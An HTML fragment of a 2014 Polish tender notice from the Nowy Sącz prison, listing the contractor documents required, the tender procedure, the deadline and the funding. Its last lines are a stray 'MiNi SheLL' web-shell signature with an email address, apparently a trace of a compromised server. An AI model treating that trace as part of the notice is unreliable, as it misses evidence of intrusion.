<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty Wykonawcy, pod warunkiem zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl (okręg OISW Kraków, nazwa jednostki Zakład Karny w Nowym Sączu,dotyczy usługi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Nowym Sączu, 33-300 Nowy Sącz , ul. Pijarska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2014 godzina 10:00, miejsce: Sekretariat Zakładu Karnego w Nowym Sączu, 33-300 Nowy Sacz , ul. Pijarska 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Roboty budowlano - instalacyjne, nadzorowane przez Inżyniera Kontraktu, dofinansowano ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej (zwanym dalej NFOŚiGW) w ramach programu priorytetowego System Zielonych Inwestycji (GIS - Green  Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych  podmiotów sektora finansów publicznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com